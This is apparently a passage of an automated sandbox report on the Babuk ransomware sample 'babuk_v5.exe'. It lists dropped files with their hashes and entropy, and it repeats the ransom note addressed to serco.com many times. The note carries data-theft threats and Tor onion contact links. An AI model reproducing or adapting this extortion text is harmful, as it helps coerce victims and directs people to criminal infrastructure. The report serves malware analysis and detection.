                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.491720845718369
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlwFK6jO1yoa0DnmWN1D5Tc6MfZhAY3D3Z5d+9o2SUVLt5+UxNvEEn:gKQO1yoa0ThNQN3A0Z5et5+0vtn
                                                                            MD5:91B361CD0D32B51DBAB6CD9912585FA5
                                                                            SHA1:E03729B25C573E3DA5E6EC4AE5D389A0AE7E58DB
                                                                            SHA-256:98A1E02541F86FDA3E1A749E6C1C8D210948C89A007BF9B6424D4B41936CC058
                                                                            SHA-512:3913C0B83B9B60CC67A171B9583788435FB08B1E87829FFDD0EE896B29FE348C68260B7325150D279FCC11E1C85ED3EACFC9FCC1098BB83593D13F79D3D8AA08
                                                                            Malicious:false
                                                                            Preview: ....ZW...eP]t.#.o.......kC.............Qf.P.N...4aO\....h......I......\u....&.....f...n..\.(...m.Xo.=.h......q.~'...n.......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG1.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976664756514274
                                                                            Encrypted:false
                                                                            SSDEEP:192:fwHt7XmU9vhF5b4XVQ0xZaXg01ulG+Y6nZ:fWftz18OXv1R6nZ
                                                                            MD5:E16A166099424054EAE775CA1B0BA7C4
                                                                            SHA1:F3E3682FA284E24BEDBAEF4988CEFA811F4981DD
                                                                            SHA-256:E2855CB432FF10731F1B05131821B80FECACB58D0F0B03CB12B32BF48471A0FF
                                                                            SHA-512:0880C6080B928EC4C6B7B3EDF0E2546B925BD2B5B190A8A3D7DA939EC53E44152E1CB62D794126036B57BE7BCFAE565E753374B3A49BD5CDA69FE77DE0DE2669
                                                                            Malicious:false
                                                                            Preview: >Y8..?.~.g.....1...df.#..:.,.`8.Zj...=...^..I.N..~.-..3.u._nN..C. ......s........n.SR....E.%....OT-......^..P.T...#..u.....D8..[.397......&.Z26n....n-=p..:....Q.{I....Nv(.kh\26{.$+..L.u.(1!k.v..X./q..\kus..ru..U..2V.[...S1.y+Z.B.;.U.."...4<..?...i..RnE.6=`..T.j.....A.aVdwXW....D...{0...,.9..9"^.i\6#d4..F...T../h...r.(#.W.r.Zqz?.a.$~ .4..kW...Y...5.r.@@......-.R..._.....{.'.^....[7b..k#.......j@$.Cg..F4.A.xI@V@.;3.QJ.......rm7..q..."6.T.....0.m......iL...3d.....O. .2D.z.9..42.S..9...-k.....I..gF.?............P.......V...&.......s-s.....)d...c...j])...X.)...=e..."M.1.Uj]...\.......!.;\..Z...m.r"...ttdn"v...`..c....{.V.rI.v[n.?$.....3....e..../.KZP.C^V!..f.D....w...Iy.#.2.vB;.Z..t..v.G..&|.;..=.l.x+..p..w.[...k.>..hA..+.9S...4.u..F..dl.V.<.)........4...xv....].....aC<....z..........^.k.#.'..E.. pnc_...N.p]V*/.?h.d.......y..'V^...Q.H{...j.d....|..W,&.9^!..&{.j..7..\e...%@).>!...7.t.>..o..,......m....,..%7h.......F..;.-N.%..+/u..5.BD.a....${.Q^
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG2.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.5345974440390275
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlK9TU3fuBHJeBXZwniFLDqIoD6VdWZ/BbLnj8Aq2LztOubK/mJZGUB8LUxNvEEn:aIWBHJeFOncLDqIo2VQnj8ANLpsmJ4+D
                                                                            MD5:E57F0B86AECC1DC3502D149F50364982
                                                                            SHA1:730397A0842B0EA9CFF4021362961B5FD36FAB86
                                                                            SHA-256:23656A88C33E8646D9D7151B6639B5F054D4060E4AA9D650800CF5DE23C6F245
                                                                            SHA-512:B290BC20567698C602F318F41FBC76141831A29046621BC68698DFD76B156400D4B2E26EA9C8B3A1DDBCC9511DC2107ACFA3E3EF40F8DF6692518B5DCE236A6D
                                                                            Malicious:false
                                                                            Preview: ....c..M.,..7k.:....W..bH 79z......TH........N....s.e..A.o..].@.].sM.s.....^....G.h..N...{S..'.P....5..e.I.....y...".}.._\qZC.<c........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.978268348387075
                                                                            Encrypted:false
                                                                            SSDEEP:192:UrwpCWy/mWPHYHgihYTZIrsg6M235ty3J145cu8btmbs34pKWVJ:Us0b/lqNAZ4sxM235tCM5cjbtH3uVJ
                                                                            MD5:520077DFBD83B6981B2FAB046FED002D
                                                                            SHA1:D6E2CAE9F84095C8C11A16562BEA1EB5D33336DB
                                                                            SHA-256:8164C27E83F40541B304479D0E1B75CCB46CE86452F87F7F28A8A6C640E2F3ED
                                                                            SHA-512:454CA04A06D421514AD2AD5684A7913EF79DF1B5DAD41895BBD5AAC31FDAD0C2FA6E26F30FFBA5CE545513238A122EAB40C9F64FBE375D5A1208CA750253960E
                                                                            Malicious:false
                                                                            Preview: ..Rv.`.*7./.....>...1.y..IR....g..S...U.>Z.QC.ce.M...~...2..:.Z.gak...V.n.Dx.;......C..[9.?x....f..../>..+...k..]W.-eN..W....3.........\.0_.-D.O.....#..q.t....e2B.3:s.}].z..?E.5..j...Bw.1nb.l.m.d.z6Jr~.U...>!.r..V"|..b%w.a..+tT....sDaU.T]........FO.4."...j~.f.".g.....c.-...........y(1&/g,Y..)..YT.1..!....`.6.F..D..r.j...lb..Y..R..(y..slE...Tr..&...c.}S..A.h.R..a.(....Pa..%\....o.....{.Jh2X..(!#..*O.*6....!e....b~...S..r`.B.........Q...8.q.EXo....o\...Z....[....Nl......d.....x....<...s.g....g....X.<....2.H....n[5y'y.n<.....zg_......?0......[.t.h..R./!.W2....?"(..8......_2..]na.(..RdJ..{....O.X.._G.........=...2.|.b.pI..G..A...cQ.:/.x.'7.Vf.).v...}..ADl.4......3C|..t..Mp..5..]Z.j..|.KiFL,*e........x..#.....o..!..]W]Q..D..D.[.,B....;9Gp."...U.o9.........'......(..F..J....}..D..IF..0....E.z..._j7".:c..e.K.....P....3.E..>G...:@...k(.q.@.2j`S..[JQ..U....!q{..{..K. ......4...J.._.H...U.....@g/.....[..Q....-QLd;p..R......P.0.Cn.8%...R.HW.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
